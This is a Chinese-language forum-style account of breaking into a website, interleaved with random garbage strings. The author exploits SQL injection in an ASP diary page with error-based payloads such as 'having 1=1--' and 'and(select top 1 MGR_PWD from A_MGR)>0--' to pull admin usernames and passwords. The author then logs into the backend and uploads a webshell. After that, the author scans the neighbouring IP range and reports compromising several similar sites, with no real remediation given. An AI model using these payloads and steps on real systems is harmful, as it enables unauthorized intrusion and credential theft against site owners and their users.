发现一个注入点
' Z& {5 F+ g$ lhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833892 {" V1 d3 o. z
. y1 n6 T1 a. b' r% s. N5 W习惯性的加’having1=1--; |6 d! M4 W& s& f. @% A
0 ~* V% D! g! E0 e
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—" Q0 ~! @0 _" i% l% S& [
2 h- e2 {/ ]8 z2 L09 N. K' A% z# ~5 J. i( W
6 \% o9 U5 F5 M) a4 |& @4 `; _1 \爆出Diary_A.dl_Title(这时候很激动啊)
, `# l1 E5 W! J; U0 [0 Y& ?
: W1 y# p/ I7 |5 T) M那么继续
+ M/ i8 l2 w ^- z4 L( Chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
. Z1 C, o0 B0 K9 E) G* r5 c8 H1 N
9 N0 Q# k7 n$ C5 m继续,一直爆下去
1 W' e- ~- ^6 U6 V* z1 {" [! P
7 S) e# Z; Z4 T O' f- b爆到几个字段和表段 但是没找到需要的管理用户的字段2 m) i& G$ X* D) R# ~
1 W j" c, j: Q8 M蛋疼了 怎么办 然后去后台登陆页看源码9 n2 j& [+ n4 N6 a# Q
6 e/ u8 A7 N8 E8 [3 d& u. j- _# \0) O5 f+ t; g2 F; }- l B% _* m
9 i) L6 D; s W' U; Y
Input name= “ADUID”
% `/ m2 X# _9 R) ]- }Input name= “ADPWD”& _# s) y3 G- ?$ C4 A' M
: ]. O/ L1 k1 r% ~3 o) s2 u$ r( x
很幸运 找到了字段那就继续
( ]" w' r& X) W' t$ c找到之后开始爆用户6 R+ h# O' `5 B
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—! Z- Z6 y8 c! ~) |9 m9 V
爆密码
9 Z \/ A! n: S9 Y* Q! uhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
0 S4 ~' ?- x ]* A& y5 q1 O# A: g8 l测试了下 这个注入点只能爆到文章哪里的表 . ]* l' ^( q! S& o8 P
" y$ O" F. @, A: S头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
$ X. k1 Q. m6 S7 a( w
6 d q+ U) J0 G0 w1 q: e# b又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了3 @1 W3 U' d R# h
+ @- L, W0 m% B& @$ B! h: a# x473! m# V: I' m$ n
6 t% V7 F' B3 Z# C6 l: M0 m进后台2 R* E& S$ S U# `$ g3 d: [
8 \( p1 T7 y) A% r0 o* N
% F5 _8 H! S0 Y
发现几个上传点 有的地方不能上传 而且防止恶意代码8 I' o4 b, I2 h
+ u& B% t: h8 ^! j6 z没办法 各种百度各种找大牛 找到一只好像可以突破的马. |6 s1 I6 n( w6 j+ a7 `
5 Q4 \% _$ r/ _' d: o( f
: V( g+ M' M7 z7 o7 ?) B在系统管理那里直接上传 不过没有显示地址) n4 z) K, F$ b7 E* h7 Z0 R
8 z0 W; p) {/ p: o
再上传一次 抓包 搞定OK) f$ L7 J$ E! f! Y3 @; g
% n) A$ Z) m, ?5 k4 Y( @
( V7 M: ]- _2 L2 a4 }
! {0 \( c9 {7 l, @; d& E+ h: v/ _472
% E/ Q$ m& f1 Q+ Y1 G9 f; A) u1 b" l. _7 m6 b; K3 E) v0 [( G
晚上不行了 去睡觉。。。
: [ {% `8 b; V+ k2 _& x第二天刚起床 闲的没事做继续日站吧 $ C0 m8 ^; Q% y# p
; t N! |$ [! Q$ o: E. u. i6 [
找个站 就把这个站的旁c扫了下
* Z2 `. X7 v1 h+ {! g# i8 N' K5 K; R7 K. F# Q) r; o7 b4 s i
发现c段也有一个购物站 ,然后还和这个站的模板差不多
8 N7 L: u* s4 }, T% t$ B, r; P: K; T* ?3 f2 A7 h% X: K5 `: I
就找到会员登录口测试
7 ~9 A! s/ I& a- K. S; t% D2 D }, F% [- |( s- Q. Y2 i
'and (select top 1 MGR_UID from A_MGR)>0—) s7 f! w/ f9 L/ g/ @% Y
果断爆到了 这时候我很激动 通杀
! J9 _8 j, y. [# y
: ~( G+ R8 o9 q- T9 ]再次翻c段
# E. [/ l+ _' T* N0 z5 U2 v2 s: z8 k
翻出几个站 都成功拿下
1 U/ P) j# r1 j4 k! e$ J6 F0 _
/ q/ }( G" A( p) l7 p( A
4 R& q8 v0 [1 c) F E, q
) y. U0 q) @/ w5 Y6 W3 `" c修复方案:. m. r# n" w3 R7 v4 Z! p" Q9 I- n
他们比我专业 9 n" y, q& y% n4 X- Q& ]
( U, j9 D& d, x) P' y/ b3 W5 m
( w0 q i1 h1 b6 O$ h3 C4 D- g- K+ [1 A/ b# w% s; S2 ?
|